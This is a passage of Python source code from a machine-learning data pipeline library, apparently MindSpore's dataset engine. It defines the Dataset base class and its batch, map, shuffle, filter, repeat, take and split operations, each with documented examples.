FILES: str = "files"
INFILE: str = "infile"
ShuffleToShuffleMode = {Shuffle.FILES: cde.ShuffleMode.FILES,
Shuffle.GLOBAL: cde.ShuffleMode.GLOBAL,
Shuffle.INFILE: cde.ShuffleMode.INFILE}
def shuffle_to_shuffle_mode(shuffle):
"""
Shuffle Enum to Shuffle Mode
Args:
shuffle (Shuffle): shuffle flag to shuffle mode in C layer
Returns:
ShuffleMode, shuffle mode
"""
shuffle_mode = cde.ShuffleMode.GLOBAL # Global shuffle
if not isinstance(shuffle, Shuffle):
if shuffle is None or shuffle:
shuffle_mode = cde.ShuffleMode.GLOBAL # Global shuffle
else:
shuffle_mode = cde.ShuffleMode.FALSE # No shuffle
else:
shuffle_mode = ShuffleToShuffleMode[shuffle]
return shuffle_mode
def shuffle_to_bool(shuffle):
"""
Shuffle Enum to bool
Args:
shuffle (Shuffle): shuffle flag to bool
Returns:
bool, True / False
"""
shuffle_bool = True
if not isinstance(shuffle, Shuffle):
if shuffle is None:
shuffle_bool = None
elif shuffle:
shuffle_bool = True
else:
shuffle_bool = False
else:
shuffle_bool = True
return shuffle_bool
@check_zip
def zip(datasets):
"""
Zip the datasets in the input tuple of datasets.
Args:
datasets (tuple of class Dataset): A tuple of datasets to be zipped together.
The number of datasets must be more than 1.
Returns:
Dataset, dataset zipped.
Raises:
ValueError: If the number of datasets is 1.
TypeError: If datasets is not a tuple.
Examples:
>>> # Create a dataset which is the combination of dataset_1 and dataset_2
>>> dataset = ds.zip((dataset_1, dataset_2))
"""
if len(datasets) <= 1:
raise ValueError(
"Can't zip empty or just one dataset!")
for dataset in datasets:
if not isinstance(dataset, Dataset):
raise TypeError("Invalid dataset, expected Dataset object, but got %s!" % type(dataset))
return ZipDataset(datasets)
def _get_operator_process():
"""
Inner implemented method, mainly for passing sub-process id in C layer
Returns:
dict, mapping dict of operator id and corresponding process id.
"""
global _OP_PROCESS
process_info = _OP_PROCESS
op_process = dict()
keys = process_info.keys()
fetched_all = True
for key in keys:
op_process[key] = list(process_info[key][1])
item_full = (len(process_info[key][1]) == process_info[key][0])
fetched_all = fetched_all and item_full
return op_process, fetched_all
def _set_dataset_permissions(file_name, num_files):
"""
set saved dataset files' permissions to 600
the rule of dataset filenames should be the same as those in C++.
"""
num_digits = len(str(num_files - 1))
if num_files == 1:
paths = [file_name]
else:
paths = ["{}{}".format(file_name, str(x).rjust(num_digits, '0')) for x in range(num_files)]
for item in paths:
if os.path.exists(item):
os.chmod(item, stat.S_IRUSR | stat.S_IWUSR)
index_file = item + ".db"
if os.path.exists(index_file):
os.chmod(index_file, stat.S_IRUSR | stat.S_IWUSR)
class Dataset:
"""
Abstract class to represent a dataset in DataEngine's data pipeline.
This class is the base class of SourceDataset and Dataset, and represents
a node in the data flow graph.
Dataset
-----------------------------------------------------------
| | | |
VisionBaseDataset TextBaseDataset AudioBaseDataset |
- - - |
| | | |
---------------------------------------- |
UnionBaseDataset |
|
SourceDataset
-
|
MappableDataset
DatasetOperator: MapDataset(UnionBaseDataset)
BatchDataset(UnionBaseDataset)
BucketBatchByLengthDataset(UnionBaseDataset)
ShuffleDataset(UnionBaseDataset)
FilterDataset(UnionBaseDataset)
RepeatDataset(UnionBaseDataset)
SkipDataset(UnionBaseDataset)
TakeDataset(UnionBaseDataset)
ZipDataset(UnionBaseDataset)
ConcatDataset(UnionBaseDataset)
RenameDataset(UnionBaseDataset)
ProjectDataset(UnionBaseDataset)
SyncWaitDataset(UnionBaseDataset)
Impl Dataset - vision: ImageFolderDataset(MappableDataset, VisionBaseDataset)
USPSDataset(SourceDataset, VisionBaseDataset)
Impl Dataset - text: TextFileDataset(SourceDataset, TextBaseDataset)
YahooAnswersDataset(SourceDataset, TextBaseDataset)
Impl Dataset - audio: LJSpeechDataset(MappableDataset, AudioBaseDataset)
TedliumDataset(MappableDataset, AudioBaseDataset)
Impl Dataset - standard: MindDataset(MappableDataset, UnionBaseDataset)
TFRecordDataset(SourceDataset, UnionBaseDataset)
Impl Dataset - user defined: GeneratorDataset(MappableDataset, UnionBaseDataset)
NumpySlicesDataset(GeneratorDataset)
Args:
num_parallel_workers (int, optional): Number of workers to process the dataset in parallel
(default=None).
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
# Note: children and parent are internal variables, not recommended for external using.
self.children = replace_none(children, [])
if isinstance(self.children, tuple):
self.children = list(self.children)
if not isinstance(self.children, list):
self.children = [self.children]
self.parent = []
for child in self.children:
child.parent.append(weakref.ref(self))
self.num_parallel_workers = num_parallel_workers
self.cache = cache
self._device_iter = 0
self._input_indexs = ()
self.saved_output_types = None
self.saved_output_shapes = None
self.dynamic_setting = [False, None]
self.saved_min_shapes = None
self.saved_max_shapes = None
self._col_names = None
self.dataset_size = None
self._batch_size = None
self._num_classes = None
self._repeat_count = None
self._class_indexing = None
self._sync = False
def create_ir_tree(self):
"""
Internal method to build an IR tree.
Returns:
DatasetNode, the root node of the IR tree.
Dataset, the root dataset of the IR tree.
"""
parent = self.parent
self.parent = []
dataset = copy.deepcopy(self)
global _OP_NAME
_OP_NAME = Dataset._get_operator_id(dataset)
ir_tree = dataset.parse_tree()
self.parent = parent
_init_device_info()
return ir_tree, dataset
def close_pool(self):
"""
Close multiprocessing pool in dataset. If you are familiar with multiprocessing library, you can regard this
as a destructor for a processingPool object.
"""
# del all the SharedQueue when close the pool
if hasattr(self, 'process_pool') and self.process_pool is not None:
self.process_pool.delete_shared_memory()
self.process_pool.close_pool()
for child in self.children:
child.close_pool()
def notify_watchdog(self):
"""
Close watchdog thread in dataset. Now GeneratorDataset/map/batch will use a thread named watch_dog to monitor
multiprocess, for get_dataset_size/output_shapes/output_types/get_col_name/num_classes, we need notify_watchdog
to close watch_dog thread manually.
"""
if hasattr(self, 'sample_fn') and self.sample_fn is not None:
if self.sample_fn.multi_process:
self.sample_fn._abort_watchdog() # pylint: disable=W0212
if hasattr(self, 'process_pool') and self.process_pool is not None:
self.process_pool.abort_watchdog()
for child in self.children:
child.notify_watchdog()
@staticmethod
def _get_operator_id(dataset):
"""
Internal method to iterate the tree and obtain op_id of each operator.
Returns:
Dataset, the root dataset of the tree.
"""
op_name = dict()
generator_process = dict()
op_name[str(dataset)] = 0
op_id = 1
def process_name(datasets, operator_id):
if not datasets:
return 0
temp = []
for item in datasets:
for d in item.children:
temp.append(d)
op_name[str(d)] = operator_id
from mindspore.dataset.engine.datasets_user_defined import GeneratorDataset
if isinstance(d, GeneratorDataset) and d.sample_fn and d.sample_fn.pids:
generator_process[operator_id] = [d.num_parallel_workers, set(d.sample_fn.pids)]
operator_id = operator_id + 1
return process_name(temp, operator_id)
process_name([dataset], op_id)
if generator_process:
global _OP_PROCESS
_OP_PROCESS.update(generator_process)
return op_name
def parse_tree(self):
"""
Internal method to parse the API tree into an IR tree.
Returns:
DatasetNode, the root node of the IR tree.
"""
if len(self.parent) > 1:
raise ValueError("The data pipeline is not a tree (i.e., one node has 2 consumers)")
ir_children = [d.parse_tree() for d in self.children]
# Bootstrap can only be performed on a copy of the original dataset node.
# Bootstrap on original dataset node will make all iterators share the same process pool
self.iterator_bootstrap()
ir_node = self.parse(ir_children)
ir_node = self.post_parse(ir_node)
return ir_node
def __safe_deepcopy__(self, memodict, exclude=()):
if id(self) in memodict:
return memodict[id(self)]
cls = self.__class__
new_op = cls.__new__(cls)
memodict[id(self)] = new_op
for arg, value in self.__dict__.items():
if arg in exclude:
setattr(new_op, arg, value)
else:
try:
setattr(new_op, arg, copy.deepcopy(value, memodict))
except TypeError:
setattr(new_op, arg, value)
return new_op
def iterator_bootstrap(self):
pass
@staticmethod
def _noop_mode():
if _is_role_sched() or _is_role_pserver():
return True
return False
def __add__(self, datasets):
return self.concat(datasets)
def to_json(self, filename=""):
"""
Serialize a pipeline into JSON string and dump into file if filename is provided.
Args:
filename (str): filename of JSON file to be saved as (default="").
Returns:
str, JSON string of the pipeline.
"""
ir_tree, _ = self.create_ir_tree()
return json.loads(ir_tree.to_json(filename))
@check_bucket_batch_by_length
def bucket_batch_by_length(self, column_names, bucket_boundaries, bucket_batch_sizes, element_length_function=None,
pad_info=None, pad_to_bucket_boundary=False, drop_remainder=False):
"""
Bucket elements according to their lengths. Each bucket will be padded and batched when
they are full.
A length function is called on each row in the dataset. The row is then
bucketed based on its length and bucket boundaries. When a bucket reaches its
corresponding size specified in bucket_batch_sizes, the entire bucket will be
padded according to pad_info, and then form a batch.
Each batch will be full, except one special case: the last batch for each bucket may not be full.
Args:
column_names (list[str]): Columns passed to element_length_function.
bucket_boundaries (list[int]): A list consisting of the upper boundaries
of the buckets. Must be strictly increasing. If there are n boundaries,
n+1 buckets are created: One bucket for [0, bucket_boundaries[0]), one
bucket for [bucket_boundaries[i], bucket_boundaries[i+1]) for each
0<i<n-1, and the last bucket for [bucket_boundaries[n-1], inf).
bucket_batch_sizes (list[int]): A list consisting of the batch sizes for
each bucket. Must contain len(bucket_boundaries)+1 elements.
element_length_function (Callable, optional): A function that takes in
M arguments where M = len(column_names) and returns an integer. If no value
provided, parameter M the len(column_names) must be 1, and the size of the first
dimension of that column will be taken as the length (default=None).
pad_info (dict, optional): The information about how to batch each column. The key
corresponds to the column name, and the value must be a tuple of 2 elements.
The first element corresponds to the shape to pad to, and the second
element corresponds to the value to pad with. If a column is not
specified, then that column will be padded to the longest in the current
batch, and 0 will be used as the padding value. Any None dimensions will
be padded to the longest in the current batch, unless if
pad_to_bucket_boundary is True. If no padding is wanted, set pad_info
to None (default=None).
pad_to_bucket_boundary (bool, optional): If True, will pad each None
dimension in pad_info to the bucket_boundary minus 1. If there are any
elements that fall into the last bucket, an error will occur
(default=False).
drop_remainder (bool, optional): If True, will drop the last batch for each
bucket if it is not a full batch (default=False).
Returns:
Dataset, dataset bucketed and batched by length.
Examples:
>>> # Create a dataset where certain counts rows are combined into a batch
>>> # and drops the last incomplete batch if there is one.
>>> import numpy as np
>>> def generate_2_columns(n):
... for i in range(n):
... yield (np.array([i]), np.array([j for j in range(i + 1)]))
>>>
>>> column_names = ["col1", "col2"]
>>> dataset = ds.GeneratorDataset(generate_2_columns(8), column_names)
>>> bucket_boundaries = [5, 10]
>>> bucket_batch_sizes = [2, 1, 1]
>>> element_length_function = (lambda col1, col2: max(len(col1), len(col2)))
>>> # Will pad col2 to shape [bucket_boundaries[i]] where i is the
>>> # index of the bucket that is currently being batched.
>>> pad_info = {"col2": ([None], -1)}
>>> pad_to_bucket_boundary = True
>>> dataset = dataset.bucket_batch_by_length(column_names, bucket_boundaries,
... bucket_batch_sizes,
... element_length_function, pad_info,
... pad_to_bucket_boundary)
"""
return BucketBatchByLengthDataset(self, column_names, bucket_boundaries, bucket_batch_sizes,
element_length_function, pad_info, pad_to_bucket_boundary, drop_remainder)
@check_batch
def batch(self, batch_size, drop_remainder=False, num_parallel_workers=None, per_batch_map=None,
input_columns=None, output_columns=None, column_order=None, pad_info=None,
python_multiprocessing=False, max_rowsize=16):
"""
Combine batch_size number of consecutive rows into batches.
For any child node, a batch is treated as a single row.
For any column, all the elements within that column must have the same shape.
If a per_batch_map callable is provided, it will be applied to the batches of tensors.
Note:
The order of using repeat and batch reflects the number of batches and per_batch_map.
It is recommended that the repeat operation applied after the batch operation finished.
Args:
batch_size (int or function): The number of rows each batch is created with. An
int or callable object which takes exactly 1 parameter, BatchInfo.
drop_remainder (bool, optional): Determines whether or not to drop the last block
whose data row number is less than batch size (default=False). If True, and if there are less
than batch_size rows available to make the last batch, then those rows will
be dropped and not propagated to the child node.
num_parallel_workers (int, optional): Number of workers(threads) to process the dataset in parallel
(default=None).
per_batch_map (callable, optional): Per batch map callable (default=None). A callable which takes
(list[Tensor], list[Tensor], ..., BatchInfo) as input parameters. Each list[Tensor] represents a batch
of Tensors on a given column. The number of lists should match with the number of entries in
input_columns. The last parameter of the callable should always be a BatchInfo object. Per_batch_map
should return (list[Tensor], list[Tensor], ...). The length of each list in output should be the same as
the input. output_columns is required if the number of output lists is different from input.
input_columns (Union[str, list[str]], optional): List of names of the input columns. The size of the list
should match with signature of per_batch_map callable (default=None).
output_columns (Union[str, list[str]], optional): List of names assigned to the columns
outputted by the last operation. This parameter is mandatory if len(input_columns) !=
len(output_columns). The size of this list must match the number of output
columns of the last operation. (default=None, output columns will have the same
name as the input columns, i.e., the columns will be replaced).
column_order (Union[str, list[str]], optional): Specifies the list of all the columns you need in the whole
dataset (default=None). The parameter is required when len(input_column) != len(output_column).
Caution: the list here is not just the columns specified in parameter input_columns and output_columns.
pad_info (dict, optional): Whether to perform padding on selected columns. pad_info={"col1":([224,224],0)}
would pad column with name "col1" to a tensor of size [224,224] and fill the missing with 0
(default=None).
python_multiprocessing (bool, optional): Parallelize Python function per_batch_map with multi-processing.
This option could be beneficial if the function is computational heavy (default=False).
max_rowsize(int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (default=16).
Returns:
BatchDataset, dataset batched.
Examples:
>>> # Create a dataset where every 100 rows are combined into a batch
>>> # and drops the last incomplete batch if there is one.
>>> dataset = dataset.batch(100, True)
>>> # resize image according to its batch number, if it's 5-th batch, resize to (5^2, 5^2) = (25, 25)
>>> def np_resize(col, BatchInfo):
... output = col.copy()
... s = (BatchInfo.get_batch_num() + 1) ** 2
... index = 0
... for c in col:
... img = Image.fromarray(c.astype('uint8')).convert('RGB')
... img = img.resize((s, s), Image.ANTIALIAS)
... output[index] = np.array(img)
... index += 1
... return (output,)
>>> dataset = dataset.batch(batch_size=8, input_columns=["image"], per_batch_map=np_resize)
"""
return BatchDataset(self, batch_size, drop_remainder, num_parallel_workers, per_batch_map, input_columns,
output_columns, column_order, pad_info, python_multiprocessing, max_rowsize)
@check_sync_wait
def sync_wait(self, condition_name, num_batch=1, callback=None):
"""
Add a blocking condition to the input Dataset. A synchronize action will be applied.
Args:
condition_name (str): The condition name that is used to toggle sending next row.
num_batch (int): the number of batches without blocking at the start of each epoch (default=1).
callback (function): The callback function that will be invoked when sync_update is called (default=None).
Returns:
SyncWaitDataset, dataset added a blocking condition.
Raises:
RuntimeError: If condition name already exists.
Examples:
>>> import numpy as np
>>> def gen():
... for i in range(100):
... yield (np.array(i),)
>>>
>>> class Augment:
... def __init__(self, loss):
... self.loss = loss
...
... def preprocess(self, input_):
... return input_
...
... def update(self, data):
... self.loss = data["loss"]
>>>
>>> batch_size = 4
>>> dataset = ds.GeneratorDataset(gen, column_names=["input"])
>>>
>>> aug = Augment(0)
>>> dataset = dataset.sync_wait(condition_name="policy", callback=aug.update)
>>> dataset = dataset.map(operations=[aug.preprocess], input_columns=["input"])
>>> dataset = dataset.batch(batch_size)
>>> count = 0
>>> for data in dataset.create_dict_iterator(num_epochs=1, output_numpy=True):
... assert data["input"][0] == count
... count += batch_size
... data = {"loss": count}
... dataset.sync_update(condition_name="policy", data=data)
"""
return SyncWaitDataset(self, condition_name, num_batch, callback)
@check_shuffle
def shuffle(self, buffer_size):
"""
Randomly shuffles the rows of this dataset using the following policy:
1. Make a shuffle buffer that contains the first buffer_size rows.
2. Randomly select an element from the shuffle buffer to be the next row
propagated to the child node.
3. Get the next row (if any) from the parent node and put it in the shuffle buffer.
4. Repeat steps 2 and 3 until there are no more rows left in the shuffle buffer.
A random seed can be provided to be used on the first epoch. In every subsequent
epoch, the seed is changed to a new one, randomly generated value.
Args:
buffer_size (int): The size of the buffer (must be larger than 1) for
shuffling. Setting buffer_size equal to the number of rows in the entire
dataset will result in a global shuffle.
Returns:
Dataset, dataset shuffled.
Raises:
RuntimeError: If exist sync operators before shuffle.
Examples:
>>> # dataset is an instance object of Dataset
>>> # Optionally set the seed for the first epoch
>>> ds.config.set_seed(58)
>>> # Create a shuffled dataset using a shuffle buffer of size 4
>>> dataset = dataset.shuffle(4)
"""
return ShuffleDataset(self, buffer_size)
def flat_map(self, func):
"""
Map `func` to each row in dataset and flatten the result.
The specified `func` is a function that must take one 'Ndarray' as input
and return a 'Dataset'.
Args:
func (function): A function that must take one 'Ndarray' as an argument and
return a 'Dataset'.
Returns:
Dataset, dataset applied by the function.
Examples:
>>> # use NumpySlicesDataset as an example
>>> dataset = ds.NumpySlicesDataset([[0, 1], [2, 3]])
>>>
>>> def flat_map_func(array):
... # create a NumpySlicesDataset with the array
... dataset = ds.NumpySlicesDataset(array)
... # repeat the dataset twice
... dataset = dataset.repeat(2)
... return dataset
>>>
>>> dataset = dataset.flat_map(flat_map_func)
>>> # [[0, 1], [0, 1], [2, 3], [2, 3]]
Raises:
TypeError: If `func` is not a function.
TypeError: If `func` doesn't return a Dataset.
"""
dataset = None
if not hasattr(func, '__call__'):
logger.critical("func must be a function.")
raise TypeError("func must be a function.")
for row_data in self.create_tuple_iterator(output_numpy=True):
if dataset is None:
dataset = func(row_data)
else:
dataset += func(row_data)
if not isinstance(dataset, Dataset):
logger.critical("flat_map must return a Dataset object.")
raise TypeError("flat_map must return a Dataset object.")
return dataset
@check_map
def map(self, operations, input_columns=None, output_columns=None, column_order=None,
num_parallel_workers=None, python_multiprocessing=False, cache=None, callbacks=None,
max_rowsize=16, offload=None):
"""
Apply each operation in operations to this dataset.
The order of operations is determined by the position of each operation in the operations parameter.
operations[0] will be applied first, then operations[1], then operations[2], etc.
Each operation will be passed one or more columns from the dataset as input, and zero or
more columns will be outputted. The first operation will be passed the columns specified
in input_columns as input. If there is more than one operator in operations, the outputted
columns of the previous operation are used as the input columns for the next operation.
The columns outputted by the very last operation will be assigned names specified by
output_columns.
Only the columns specified in column_order will be propagated to the child node. These
columns will be in the same order as specified in column_order.
Args:
operations (Union[list[TensorOperation], list[functions]]): List of operations to be
applied on the dataset. Operations are applied in the order they appear in this list.
input_columns (Union[str, list[str]], optional): List of the names of the columns that will be passed to
the first operation as input. The size of this list must match the number of
input columns expected by the first operator. (default=None, the first
operation will be passed however many columns that are required, starting from
the first column).
output_columns (Union[str, list[str]], optional): List of names assigned to the columns outputted by
the last operation. This parameter is mandatory if len(input_columns) !=
len(output_columns). The size of this list must match the number of output
columns of the last operation. (default=None, output columns will have the same
name as the input columns, i.e., the columns will be replaced).
column_order (list[str], optional): Specifies the list of all the columns you need in the whole
dataset (default=None). The parameter is required when len(input_column) != len(output_column).
Caution: the list here is not just the columns specified in parameter input_columns and output_columns.
num_parallel_workers (int, optional): Number of threads used to process the dataset in
parallel (default=None, the value from the configuration will be used).
python_multiprocessing (bool, optional): Parallelize Python operations with multiple worker processes. This
option could be beneficial if the Python operation is computational heavy (default=False).
cache (DatasetCache, optional): Use tensor caching service to speed up dataset processing.
(default=None, which means no cache is used).
callbacks (DSCallback, list[DSCallback], optional): List of Dataset callbacks to be called (Default=None).
max_rowsize (int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (Default=16).
offload (bool, optional): Flag to indicate whether offload is used (Default=None).
Note:
- Input `operations` mainly accept c_transforms, py_transforms operator in mindspore.dataset part, plus user
defined Python function(PyFuncs).
- Do not add network computing operators from mindspore.nn and mindspore.ops or others into this
`operations`.
Returns:
Dataset, dataset after mapping operation.
Examples:
>>> # dataset is an instance of Dataset which has 2 columns, "image" and "label".
>>>
>>> # Define two operations, where each operation accepts 1 input column and outputs 1 column.
>>> decode_op = c_vision.Decode(rgb=True)
>>> random_jitter_op = c_vision.RandomColorAdjust(brightness=(0.8, 0.8), contrast=(1, 1),
... saturation=(1, 1), hue=(0, 0))
>>>
>>> # 1) Simple map example.
>>>
>>> # Apply decode_op on column "image". This column will be replaced by the outputted
>>> # column of decode_op. Since column_order is not provided, both columns "image"
>>> # and "label" will be propagated to the child node in their original order.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"])
>>>
>>> # Decode and rename column "image" to "decoded_image".
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"], output_columns=["decoded_image"])
>>>
>>> # Specify the order of the output columns.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"],
... output_columns=None, column_order=["label", "image"])
>>>
>>> # Rename column "image" to "decoded_image" and also specify the order of the output columns.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"],
... output_columns=["decoded_image"], column_order=["label", "decoded_image"])
>>>
>>> # Rename column "image" to "decoded_image" and keep only this column.
>>> dataset = dataset.map(operations=[decode_op], input_columns=["image"],
... output_columns=["decoded_image"], column_order=["decoded_image"])
>>>
>>> # A simple example for mapping pyfunc. Renaming columns and specifying column order
>>> # work in the same way as the previous examples.
>>> dataset = ds.NumpySlicesDataset(data=[[0, 1, 2]], column_names=["data"])
>>> dataset = dataset.map(operations=[(lambda x: x + 1)], input_columns=["data"])
>>>
>>> # 2) Map example with more than one operation.
>>>
>>> # Create a dataset where the images are decoded, then randomly color jittered.
>>> # decode_op takes column "image" as input and outputs one column. The column
>>> # outputted by decode_op is passed as input to random_jitter_op.
>>> # random_jitter_op will output one column. Column "image" will be replaced by
>>> # the column outputted by random_jitter_op (the very last operation). All other
>>> # columns are unchanged. Since column_order is not specified, the order of the
>>> # columns will remain the same.
>>> dataset = dataset.map(operations=[decode_op, random_jitter_op], input_columns=["image"])
>>>
>>> # Rename the column outputted by random_jitter_op to "image_mapped".
>>> # Specifying column order works in the same way as examples in 1).
>>> dataset = dataset.map(operations=[decode_op, random_jitter_op], input_columns=["image"],
... output_columns=["image_mapped"])
>>>
>>> # Map with multiple operations using pyfunc. Renaming columns and specifying column order
>>> # work in the same way as examples in 1).
>>> dataset = ds.NumpySlicesDataset(data=[[0, 1, 2]], column_names=["data"])
>>> dataset = dataset.map(operations=[(lambda x: x * x), (lambda x: x - 1)], input_columns=["data"],
... output_columns=["data_mapped"])
>>>
>>> # 3) Example where number of input columns is not equal to number of output columns.
>>>
>>> # operations[0] is a lambda that takes 2 columns as input and outputs 3 columns.
>>> # operations[1] is a lambda that takes 3 columns as input and outputs 1 column.
>>> # operations[2] is a lambda that takes 1 column as input and outputs 4 columns.
>>> #
>>> # Note: The number of output columns of operation[i] must equal the number of
>>> # input columns of operation[i+1]. Otherwise, this map call will also result
>>> # in an error.
>>> operations = [(lambda x, y: (x, x + y, x + y + 1)),
... (lambda x, y, z: x * y * z),
... (lambda x: (x % 2, x % 3, x % 5, x % 7))]
>>>
>>> # Note: Since the number of input columns is not the same as the number of
>>> # output columns, the output_columns and column_order parameters must be
>>> # specified. Otherwise, this map call will also result in an error.
>>>
>>> dataset = ds.NumpySlicesDataset(data=([[0, 1, 2]], [[3, 4, 5]]), column_names=["x", "y"])
>>>
>>> # Propagate all columns to the child node in this order:
>>> dataset = dataset.map(operations, input_columns=["x", "y"],
... output_columns=["mod2", "mod3", "mod5", "mod7"],
... column_order=["mod2", "mod3", "mod5", "mod7"])
>>>
>>> # Propagate some columns to the child node in this order:
>>> dataset = dataset.map(operations, input_columns=["x", "y"],
... output_columns=["mod2", "mod3", "mod5", "mod7"],
... column_order=["mod7", "mod3", "col2"])
"""
if hasattr(self, 'operator_mixed') and getattr(self, 'operator_mixed') is True:
num_parallel_workers = 1
logger.warning(
"Input 'operations' of 'map' includes network computing operators like in mindspore.nn, mindspore.ops, "
"mindspore.numpy module and etc, which do not support multi-thread compiling, recommend to replace it "
"with python implemented operator like numpy etc. Here decrease 'num_parallel_workers' into 1.")
return MapDataset(self, operations, input_columns, output_columns, column_order, num_parallel_workers,
python_multiprocessing, cache, callbacks, max_rowsize, offload)
@check_filter
def filter(self, predicate, input_columns=None, num_parallel_workers=None):
"""
Filter dataset by prediction.
Args:
predicate (callable): Python callable which returns a boolean value. If False then filter the element.
input_columns (Union[str, list[str]], optional): List of names of the input columns. If not provided
or provided with None, the predicate will be applied on all columns in the dataset (default=None).
num_parallel_workers (int, optional): Number of workers to process the dataset
in parallel (default=None).
Returns:
Dataset, dataset filtered.
Examples:
>>> # generator data(0 ~ 63)
>>> # filter the data that greater than or equal to 11
>>> dataset = dataset.filter(predicate=lambda data: data < 11, input_columns = ["data"])
"""
return FilterDataset(self, predicate, input_columns, num_parallel_workers)
@check_repeat
def repeat(self, count=None):
"""
Repeat this dataset `count` times. Repeat infinitely if the count is None or -1.
Note:
The order of using repeat and batch reflects the number of batches. It is recommended that
the repeat operation is used after the batch operation.
Args:
count (int): Number of times the dataset is going to be repeated (default=None).
Returns:
Dataset, dataset repeated.
Examples:
>>> # dataset is an instance object of Dataset
>>>
>>> # Create a dataset where the dataset is repeated for 50 epochs
>>> dataset = dataset.repeat(50)
>>>
>>> # Create a dataset where each epoch is shuffled individually
>>> dataset = dataset.shuffle(10)
>>> dataset = dataset.repeat(50)
>>>
>>> # Create a dataset where the dataset is first repeated for
>>> # 50 epochs before shuffling. The shuffle operator will treat
>>> # the entire 50 epochs as one big dataset.
>>> dataset = dataset.repeat(50)
>>> dataset = dataset.shuffle(10)
"""
return RepeatDataset(self, count)
@check_skip
def skip(self, count):
"""
Skip the first N elements of this dataset.
Args:
count (int): Number of elements in the dataset to be skipped.
Returns:
Dataset, dataset that containing rows like origin rows subtract skipped rows.
Examples:
>>> # dataset is an instance object of Dataset
>>> # Create a dataset which skips first 3 elements from data
>>> dataset = dataset.skip(3)
"""
return SkipDataset(self, count)
@check_take
def take(self, count=-1):
"""
Takes at most given numbers of elements from the dataset.
Note:
1. If count is greater than the number of elements in the dataset or equal to -1,
all the elements in dataset will be taken.
2. The order of using take and batch matters. If take is before batch operation,
then take the given number of rows; otherwise take the given number of batches.
Args:
count (int, optional): Number of elements to be taken from the dataset (default=-1).
Returns:
Dataset, dataset taken.
Examples:
>>> # dataset is an instance object of Dataset
>>> # Create a dataset where the dataset includes 50 elements.
>>> dataset = dataset.take(50)
"""
return TakeDataset(self, count)
def _get_absolute_split_sizes(self, sizes):
"""
Internal method called by split to calculate absolute split sizes and to
do some error checking after calculating absolute split sizes.
Returns:
int, absolute split sizes of the dataset.
"""
# Call get_dataset_size here and check input here because
# don't want to call this once in check_split and another time in
# here again
dataset_size = self.get_dataset_size()
if dataset_size is None or dataset_size <= 0:
raise RuntimeError("dataset_size is unknown, unable to split.")
if not isinstance(sizes, list):
raise RuntimeError("sizes must be a list.")
all_int = all(isinstance(item, int) for item in sizes)
if all_int:
sizes_sum = sum(sizes)
if sizes_sum != dataset_size:
raise RuntimeError("Sum of split sizes {} is not equal to dataset size {}."
.format(sizes_sum, dataset_size))
return sizes
absolute_sizes = []
for item in sizes:
absolute_size = int(round(item * dataset_size))
if absolute_size == 0:
raise RuntimeError("Split percentage {} is too small.".format(item))
absolute_sizes.append(absolute_size)
absolute_sizes_sum = sum(absolute_sizes)
# if we still need more rows, give them to the first split.
# if we have too many rows, remove the extras from the first split that has
# enough rows.
size_difference = int(dataset_size - absolute_sizes_sum)
if size_difference > 0:
absolute_sizes[0] += size_difference
else:
for i, _ in enumerate(absolute_sizes):
if absolute_sizes[i] + size_difference > 0:
absolute_sizes[i] += size_difference
break
if sum(absolute_sizes) != dataset_size:
raise RuntimeError("Sum of calculated split sizes {} is not equal to dataset size {}."
.format(absolute_sizes_sum, dataset_size))
return absolute_sizes
@check_split
def split(self, sizes, randomize=True):
"""
Split the dataset into smaller, non-overlapping datasets.
This is a general purpose split function which can be called from any operator in the pipeline.
There is another, optimized split function, which will be called automatically if ds.split is
called where ds is a MappableDataset.
Args:
sizes (Union[list[int], list[float]]): If a list of integers [s1, s2, …, sn] is
provided, the dataset will be split into n datasets of size s1, size s2, …, size sn
respectively. If the sum of all input sizes does not equal the original dataset size, an
error will throw.
If a list of floats [f1, f2, …, fn] is provided, all floats must be between 0 and 1
and must sum to 1, otherwise an error will throw. The dataset will be split into n
Datasets of size round(f1*K), round(f2*K), …, round(fn*K) where K is the size of the
original dataset.
If after rounding:
- Any size equals 0, an error will occur.
- The sum of split sizes < K, the difference of K - sigma(round(fi * k)) will be added to the first
split.
- The sum of split sizes > K, the difference of sigma(round(fi * K)) - K will be removed from the first
large enough split such that it will have at least 1 row after removing the difference.
randomize (bool, optional): Determines whether or not to split the data randomly (default=True).
If True, the data will be randomly split. Otherwise, each split will be created with
consecutive rows from the dataset.
Note:
1. Dataset cannot be sharded if split is going to be called.
2. It is strongly recommended to not shuffle the dataset, but use randomize=True instead.
Shuffling the dataset may not be deterministic, which means the data in each split
will be different in each epoch.
Raises:
RuntimeError: If get_dataset_size returns None or is not supported for this dataset.
RuntimeError: If `sizes` is list of integers and sum of all elements in sizes does not
equal the dataset size.
RuntimeError: If `sizes` is list of float and there is a split with size 0 after calculations.
RuntimeError: If the dataset is sharded prior to calling split.
ValueError: If `sizes` is list of float and not all floats are between 0 and 1, or if the
floats don't sum to 1.
Returns:
tuple(Dataset), a tuple of datasets that have been split.
Examples:
>>> # TextFileDataset is not a mappable dataset, so this non-optimized split will be called.
>>> # Since many datasets have shuffle on by default, set shuffle to False if split will be called!
>>> dataset = ds.TextFileDataset(text_file_dataset_dir, shuffle=False)
>>> train_dataset, test_dataset = dataset.split([0.9, 0.1])
"""
if self.is_shuffled():
logger.warning("Dataset is shuffled before split.")
if self.is_sharded():
raise RuntimeError("Dataset should not be sharded before split.")
absolute_sizes = self._get_absolute_split_sizes(sizes)
splits = []
rows_to_skip = 0
for size in absolute_sizes:
ds = copy.deepcopy(self)
if randomize:
# want to shuffle the same way every epoch before split
# in alter_tree, shuffle buffer is minimum 10000, so use 10000 here
ds = ds.shuffle(10000)
ds.reshuffle_each_epoch = False
if rows_to_skip > 0:
ds = ds.skip(rows_to_skip)
ds = ds.take(size)
splits.append(ds)
rows_to_skip += size
return tuple(splits)
@check_zip_dataset
def zip(self, datasets):
"""
Zip the datasets in the sense of input tuple of datasets. Columns in the input datasets must have different
name.
Args:
datasets (Union[tuple, class Dataset]): A tuple of datasets or a single class Dataset
to be zipped together with this dataset.
Returns:
Dataset, dataset zipped.
Examples:
